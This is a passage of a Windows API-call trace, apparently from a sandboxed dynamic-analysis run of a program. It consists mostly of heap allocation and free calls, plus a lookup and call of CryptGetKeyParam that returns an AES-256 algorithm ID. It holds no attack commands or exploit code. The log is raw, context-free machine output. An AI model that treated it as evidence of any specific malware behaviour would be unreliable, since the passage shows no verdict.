(HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0080.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0080.240] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0080.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e27e0 [0080.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0080.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0080.241] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0080.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caa90 [0080.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0080.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0080.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0080.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafd0 [0080.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0080.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x16373) returned 0x49c6708 [0080.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0120 [0080.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf10 [0080.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0080.241] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf10 | out: hHeap=0x1780000) returned 1 [0080.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0080.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caeb0 [0080.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdb0 [0080.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf40 [0080.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0080.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0080.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0080.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caef8 [0080.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0080.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae98 [0080.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0080.241] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0080.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0080.241] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0080.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0080.241] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0080.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0080.242] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0080.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0170 [0080.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae20 [0080.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0080.242] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae20 | out: hHeap=0x1780000) returned 1 [0080.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0080.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0080.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caec8 [0080.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0080.242] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caec8 | out: hHeap=0x1780000) returned 1 [0080.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0080.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9260 [0080.242] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0080.242] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9260 | out: hHeap=0x1780000) returned 1 [0080.242] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0080.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0080.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e27c0 [0080.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01c0 [0080.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf10 [0080.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0080.242] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0080.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caec8 [0080.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0080.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf28 [0080.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0080.242] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0080.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0080.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb048 [0080.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9260 [0080.243] PeekMessageW (in: lpMsg=0x144e3e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e3e4) returned 0 [0080.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0080.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb060 [0080.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0080.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf28 [0080.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caee0 [0080.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0080.243] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0080.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0080.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafb8 [0080.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0080.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caee0 [0080.243] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0080.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e08 [0080.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0080.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb078 [0080.243] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0080.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e27e8 [0080.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae08 [0080.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0080.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf58 [0080.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0080.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadf0 [0080.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0080.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf70 [0080.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0080.243] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf70 | out: hHeap=0x1780000) returned 1 [0080.243] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0080.244] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadf0 | out: hHeap=0x1780000) returned 1 [0080.244] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0080.244] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf58 | out: hHeap=0x1780000) returned 1 [0080.244] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0080.244] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0080.244] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0080.244] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb078 | out: hHeap=0x1780000) returned 1 [0080.244] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0080.244] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0080.244] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafb8 | out: hHeap=0x1780000) returned 1 [0080.244] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff68 | out: hHeap=0x1780000) returned 1 [0080.244] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0080.244] PeekMessageW (in: lpMsg=0x144e3e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e3e4) returned 0 [0080.244] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0210 [0080.244] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf88 [0080.244] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0080.244] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae20 [0080.244] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadd8 [0080.244] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0080.244] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: hHeap=0x1780000) returned 1 [0080.244] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0080.244] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafa0 [0080.244] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0080.244] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0080.244] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ce8 [0080.244] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0080.244] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391ce8 | out: hHeap=0x1780000) returned 1 [0080.244] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0080.244] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb078 [0080.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0080.245] PeekMessageW (in: lpMsg=0x144dd94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144dd94) returned 0 [0080.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0080.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b00 [0080.245] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0080.245] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0080.245] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0080.245] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb078 | out: hHeap=0x1780000) returned 1 [0080.245] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0080.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf58 [0080.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0080.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caee0 [0080.245] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0080.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf70 [0080.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0080.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadf0 [0080.245] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0080.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb030 [0080.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0080.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadd8 [0080.245] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0080.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae68 [0080.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0080.245] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0080.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae38 [0080.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0080.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafb8 [0080.245] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0080.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafe8 [0080.246] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0080.246] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0080.246] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb000 [0080.246] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0080.246] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb018 [0080.246] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0080.246] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a92a8 [0080.246] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfea0 | out: hHeap=0x1780000) returned 1 [0080.246] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae50 [0080.246] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0080.246] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796f08 [0080.246] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2ae8 [0080.246] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad90 [0080.246] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0080.246] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0080.246] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb078 [0080.246] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0080.246] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0080.246] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0080.246] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2a0 [0080.246] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0080.246] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe50 [0080.246] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb348 [0080.246] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0080.246] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796ea8 [0080.246] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b18 [0080.246] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1e0 [0080.247] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0080.247] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1e0 | out: hHeap=0x1780000) returned 1 [0080.247] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0080.247] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0080.247] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0080.247] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb348 | out: hHeap=0x1780000) returned 1 [0080.247] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe50 | out: hHeap=0x1780000) returned 1 [0080.247] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0080.247] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0080.247] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0080.247] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0080.247] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2d0 | out: hHeap=0x1780000) returned 1 [0080.247] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0080.247] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb210 | out: hHeap=0x1780000) returned 1 [0080.247] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0080.247] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb378 | out: hHeap=0x1780000) returned 1 [0080.247] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0080.247] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb150 | out: hHeap=0x1780000) returned 1 [0080.247] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0080.247] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb168 | out: hHeap=0x1780000) returned 1 [0080.247] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0080.247] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2b8 | out: hHeap=0x1780000) returned 1 [0080.247] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0080.247] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2b8 | out: hHeap=0x1780000) returned 1 [0080.247] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0080.247] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb090 | out: hHeap=0x1780000) returned 1 [0080.247] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0080.247] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2b8 | out: hHeap=0x1780000) returned 1 [0080.247] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0080.247] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0a8 | out: hHeap=0x1780000) returned 1 [0080.248] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0080.248] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2e8 | out: hHeap=0x1780000) returned 1 [0080.248] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0080.248] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb120 | out: hHeap=0x1780000) returned 1 [0080.248] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0080.248] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0080.248] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796de8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0080.248] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0a8 | out: hHeap=0x1780000) returned 1 [0080.248] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0080.248] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0080.248] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfec8 | out: hHeap=0x1780000) returned 1 [0080.248] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0080.248] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0080.248] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0080.248] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0080.248] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0080.248] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0080.248] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe50 | out: hHeap=0x1780000) returned 1 [0080.248] CryptGetKeyParam (in: hKey=0x41ac600, dwParam=0x7, pbData=0x43e2790, pdwDataLen=0x144ddb0, dwFlags=0x0 | out: pbData=0x43e2790*=0x6610, pdwDataLen=0x144ddb0*=0x4) returned 1 [0080.248] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb270 | out: hHeap=0x1780000) returned 1 [0080.248] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0080.248] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb378 | out: hHeap=0x1780000) returned 1 [0080.248] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0f0 | out: hHeap=0x1780000) returned 1 [0080.248] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0080.248] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb288 | out: hHeap=0x1780000) returned 1 [0080.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1e0 | out: hHeap=0x1780000) returned 1 [0080.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0080.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb300 | out: hHeap=0x1780000) returned 1 [0080.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1b0 | out: hHeap=0x1780000) returned 1 [0080.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0080.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb270 | out: hHeap=0x1780000) returned 1 [0080.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1e0 | out: hHeap=0x1780000) returned 1 [0080.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0080.249] HeapFree (in: 